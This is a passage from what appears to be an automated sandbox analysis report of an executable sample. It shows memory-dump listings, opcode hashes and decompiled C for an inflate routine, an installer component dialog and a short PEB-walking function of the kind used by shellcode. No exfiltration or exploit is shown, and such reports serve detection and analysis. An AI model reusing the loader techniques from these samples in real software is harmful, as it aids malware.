                                                          0x00407037
                                                          0x0040706c
                                                          0x0040706e
                                                          0x00000000
                                                          0x0040706e
                                                          0x00000000
                                                          0x00407037
                                                          0x00000000
                                                          0x00406676
                                                          0x00407044
                                                          0x00000000
                                                          0x00407044
                                                          0x00406a58
                                                          0x00406a5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a5f
                                                          0x00000000
                                                          0x00406a5f
                                                          0x004069a4
                                                          0x00406965
                                                          0x00407049
                                                          0x0040704c
                                                          0x0040704e
                                                          0x00407057
                                                          0x0040705d
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040711C, Relevance: .3, Instructions: 300COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                          0x00407127
                                                          0x0040712f
                                                          0x00407133
                                                          0x00407135
                                                          0x00407138
                                                          0x0040713a
                                                          0x0040713a
                                                          0x0040713c
                                                          0x00407143
                                                          0x00407145
                                                          0x00407145
                                                          0x0040714b
                                                          0x00407160
                                                          0x00407168
                                                          0x0040716a
                                                          0x0040716c
                                                          0x0040716f
                                                          0x00407170
                                                          0x00407170
                                                          0x00407176
                                                          0x00000000
                                                          0x00000000
                                                          0x00407178
                                                          0x0040717b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717b
                                                          0x0040717f
                                                          0x00407182
                                                          0x00407184
                                                          0x00407184
                                                          0x00407187
                                                          0x0040718d
                                                          0x0040718e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040718e
                                                          0x00407193
                                                          0x00407196
                                                          0x00407198
                                                          0x00407198
                                                          0x0040719e
                                                          0x004071a0
                                                          0x004071b1
                                                          0x004071a4
                                                          0x004071a8
                                                          0x0040744d
                                                          0x00000000
                                                          0x0040744d
                                                          0x004071ae
                                                          0x004071af
                                                          0x004071af
                                                          0x004071b7
                                                          0x004071ba
                                                          0x004071be
                                                          0x004071c0
                                                          0x004071c2
                                                          0x004071c5
                                                          0x00000000
                                                          0x00000000
                                                          0x004071cd
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d7
                                                          0x004071d8
                                                          0x004071ed
                                                          0x004071ed
                                                          0x004071f0
                                                          0x004071f2
                                                          0x004071f2
                                                          0x004071f4
                                                          0x004071f9
                                                          0x004071fb
                                                          0x00407202
                                                          0x00407204
                                                          0x0040720c
                                                          0x0040720c
                                                          0x0040720e
                                                          0x0040720f
                                                          0x0040721e
                                                          0x00407222
                                                          0x00407226
                                                          0x00407229
                                                          0x0040722c
                                                          0x00407231
                                                          0x00407234
                                                          0x0040723a
                                                          0x00407241
                                                          0x00407247
                                                          0x00407440
                                                          0x00407440
                                                          0x00407445
                                                          0x00407454
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407445
                                                          0x00407254
                                                          0x00407257
                                                          0x0040725a
                                                          0x0040725d
                                                          0x00407261
                                                          0x00000000
                                                          0x00000000
                                                          0x0040726c
                                                          0x0040726f
                                                          0x00407270
                                                          0x00407272
                                                          0x00407278
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00407281
                                                          0x00407282
                                                          0x00407285
                                                          0x00407288
                                                          0x0040728b
                                                          0x00407291
                                                          0x00407293
                                                          0x00407293
                                                          0x0040729b
                                                          0x0040729f
                                                          0x004072a4
                                                          0x004072c9
                                                          0x004072cf
                                                          0x004072d1
                                                          0x004072d3
                                                          0x004072d6
                                                          0x004072df
                                                          0x00000000
                                                          0x00000000
                                                          0x004072a6
                                                          0x004072a6
                                                          0x004072af
                                                          0x004072b3
                                                          0x00000000
                                                          0x00000000
                                                          0x004072c4
                                                          0x004072c4
                                                          0x004072c7
                                                          0x00000000
                                                          0x00000000
                                                          0x004072b7
                                                          0x004072ba
                                                          0x004072bc
                                                          0x004072c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004072c2
                                                          0x004072c2
                                                          0x00000000
                                                          0x004072c4
                                                          0x004072e8
                                                          0x004072ee
                                                          0x004072f8
                                                          0x004072fa
                                                          0x004072ff
                                                          0x00407301
                                                          0x00407337
                                                          0x00407303
                                                          0x00407303
                                                          0x00407306
                                                          0x00407309
                                                          0x00407313
                                                          0x00407316
                                                          0x0040731d
                                                          0x00407328
                                                          0x0040732f
                                                          0x0040732f
                                                          0x00407339
                                                          0x0040733c
                                                          0x0040733e
                                                          0x00407344
                                                          0x00407344
                                                          0x0040734d
                                                          0x00407350
                                                          0x00407355
                                                          0x00407364
                                                          0x0040736c
                                                          0x00407371
                                                          0x00407395
                                                          0x0040739d
                                                          0x004073a1
                                                          0x004073a7
                                                          0x00407373
                                                          0x00407381
                                                          0x00407384
                                                          0x0040738a
                                                          0x0040738a
                                                          0x004073ab
                                                          0x00407366
                                                          0x00407366
                                                          0x00407366
                                                          0x004073bc
                                                          0x004073c0
                                                          0x004073cc
                                                          0x004073c7
                                                          0x004073ca
                                                          0x004073ca
                                                          0x004073d4
                                                          0x004073d9
                                                          0x004073e1
                                                          0x004073dd
                                                          0x004073df
                                                          0x004073df
                                                          0x004073e7
                                                          0x004073e9
                                                          0x004073f0
                                                          0x004073fa
                                                          0x00407404
                                                          0x00407420
                                                          0x00407424
                                                          0x00407269
                                                          0x0040726f
                                                          0x00407270
                                                          0x00407272
                                                          0x00407278
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407406
                                                          0x00407406
                                                          0x00407406
                                                          0x0040740b
                                                          0x00407414
                                                          0x0040741d
                                                          0x00000000
                                                          0x0040741d
                                                          0x0040742a
                                                          0x0040742a
                                                          0x0040742d
                                                          0x00407434
                                                          0x00407437
                                                          0x00000000
                                                          0x0040725a
                                                          0x004071da
                                                          0x004071dc
                                                          0x004071dc
                                                          0x004071e0
                                                          0x004071e3
                                                          0x004071e4
                                                          0x004071e4
                                                          0x00000000
                                                          0x004071dc
                                                          0x00407150
                                                          0x00407156
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 023F17F3, Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                          • Instruction ID: c83d43bbd1de8bcb717f39e87eab509d47d38ecff7cf32caca116237773e1f12
                                                          • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                          • Instruction Fuzzy Hash: 8B014C78A10208EFCB90DF99D680A9DBBF4EB08220F1085A6E958E7711D330EE50DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001000, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                          0x10001017

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.223616623.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.223600653.0000000010000000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.223633299.0000000010002000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 023F15DB, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x569dca
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
